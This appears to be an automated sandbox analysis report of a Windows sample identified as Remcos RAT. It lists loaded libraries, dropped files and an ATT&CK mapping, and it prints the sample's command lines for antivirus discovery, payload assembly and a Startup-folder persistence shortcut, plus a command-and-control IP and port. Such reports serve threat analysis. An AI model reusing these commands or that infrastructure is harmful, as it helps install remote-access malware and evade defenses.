    Source: C:\Users\user\Desktop\94e.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: 94e.exeStatic file information: File size 1820231 > 1048576
    Source: 94e.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
    Source: 94e.exeStatic PE information: real checksum: 0x1bb92d should be: 0x1cb5ee

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comFile created: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\159893\Held.comJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comFile created: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\159893\Held.comJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecureKey.urlJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecureKey.urlJump to behavior
    Source: C:\Users\user\Desktop\94e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\94e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\94e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\94e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\94e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\94e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\94e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\94e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\94e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\94e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\94e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\94e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comWindow / User API: threadDelayed 9325Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comWindow / User API: foregroundWindowGot 1764Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.com TID: 7356Thread sleep time: -127500s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.com TID: 7360Thread sleep time: -351000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.com TID: 7360Thread sleep time: -27975000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.com TID: 8124Thread sleep count: 63 > 30Jump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\159893Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\159893\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: Modes.0.drBinary or memory string: HgFsConnect-
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\94e.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Modes Modes.cmd & Modes.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 159893Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E BeastialityJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Patrick" Episode Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Proceedings + ..\Deviation + ..\Ds + ..\Lived + ..\Formed + ..\Twiki + ..\Shoot + ..\Retrieval + ..\Pounds + ..\Roland HJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\159893\Held.com Held.com HJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.com "C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.com" "C:\Users\user\AppData\Local\GuardKey Solutions\a"Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\securekey.url" & echo url="c:\users\user\appdata\local\guardkey solutions\securekey.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\securekey.url" & exit
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\securekey.url" & echo url="c:\users\user\appdata\local\guardkey solutions\securekey.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\securekey.url" & exitJump to behavior
    Source: Held.com, 0000000B.00000000.1766725429.0000000000B03000.00000002.00000001.01000000.00000007.sdmp, Held.com, 0000000B.00000003.1772928243.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com, 00000011.00000000.1885586450.0000000000913000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: logs.dat.11.drBinary or memory string: [Program Manager]
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: C:\ProgramData\rmc\logs.dat, type: DROPPED

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: C:\ProgramData\rmc\logs.dat, type: DROPPED
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid Accounts1
    Windows Management Instrumentation
    1
    Scripting
    1
    DLL Side-Loading
    1
    Deobfuscate/Decode Files or Information
    111
    Input Capture
    3
    File and Directory Discovery
    Remote Services1
    Archive Collected Data
    1
    Ingress Tool Transfer
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Native API
    1
    DLL Side-Loading
    12
    Process Injection
    1
    Obfuscated Files or Information
    LSASS Memory5
    System Information Discovery
    Remote Desktop Protocol111
    Input Capture
    1
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Command and Scripting Interpreter
    2
    Registry Run Keys / Startup Folder
    2
    Registry Run Keys / Startup Folder
    1
    Software Packing
    Security Account Manager1
    Security Software Discovery
    SMB/Windows Admin Shares1
    Clipboard Data
    1
    Non-Standard Port
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    DLL Side-Loading
    NTDS1
    Virtualization/Sandbox Evasion
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
    Masquerading
    LSA Secrets3
    Process Discovery
    SSHKeylogging2
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Virtualization/Sandbox Evasion
    Cached Domain Credentials1
    Application Window Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
    Process Injection
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579940 Sample: 94e.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 92 49 geoplugin.net 2->49 51 KPstIEdgjHZZFIeWPSSPTXW.KPstIEdgjHZZFIeWPSSPTXW 2->51 59 Suricata IDS alerts for network traffic 2->59 61 Yara detected Remcos RAT 2->61 63 Sigma detected: Search for Antivirus process 2->63 65 3 other signatures 2->65 10 94e.exe 25 2->10         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 15 cmd.exe 2 10->15         started        71 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->71 19 SecureKey.com 12->19         started        process6 file7 47 C:\Users\user\AppData\Local\Temp\...\Held.com, PE32 15->47 dropped 57 Drops PE files with a suspicious file extension 15->57 21 Held.com 3 20 15->21         started        26 cmd.exe 2 15->26         started        28 extrac32.exe 16 15->28         started        30 8 other processes 15->30 signatures8 process9 dnsIp10 53 101.99.94.64, 2404, 49736 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 21->53 55 geoplugin.net 178.237.33.50, 49738, 80 ATOM86-ASATOM86NL Netherlands 21->55 39 C:\Users\user\AppData\Local\...\SecureKey.com, PE32 21->39 dropped 41 C:\Users\user\AppData\Local\...\SecureKey.js, ASCII 21->41 dropped 43 C:\ProgramData\rmc\logs.dat, data 21->43 dropped 67 Drops PE files with a suspicious file extension 21->67 69 Installs a global keyboard hook 21->69 32 cmd.exe 2 21->32         started        45 C:\Users\user\AppData\Local\Temp\159893\H, data 26->45 dropped file11 signatures12 process13 file14 37 C:\Users\user\AppData\...\SecureKey.url, MS 32->37 dropped 35 conhost.exe 32->35         started        process15

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    94e.exe5%ReversingLabs
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.com0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\159893\Held.com0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    geoplugin.net
    178.237.33.50
    truefalse
      high
      KPstIEdgjHZZFIeWPSSPTXW.KPstIEdgjHZZFIeWPSSPTXW
      unknown
      unknownfalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://geoplugin.net/json.gpfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://www.autoitscript.com/autoit3/XHeld.com, 0000000B.00000000.1766795524.0000000000B15000.00000002.00000001.01000000.00000007.sdmp, Held.com, 0000000B.00000003.1772928243.0000000003F6C000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com, 00000011.00000000.1885708157.0000000000925000.00000002.00000001.01000000.00000009.sdmp, SecureKey.com.11.dr, Held.com.1.dr, This.8.drfalse
            high
            http://nsis.sf.net/NSIS_ErrorError94e.exefalse
              high
              https://www.autoitscript.com/autoit3/Held.com, 0000000B.00000003.1772928243.0000000003F6C000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com.11.dr, Held.com.1.dr, Sure.8.drfalse
                high
                http://www.teamviewer.com94e.exefalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
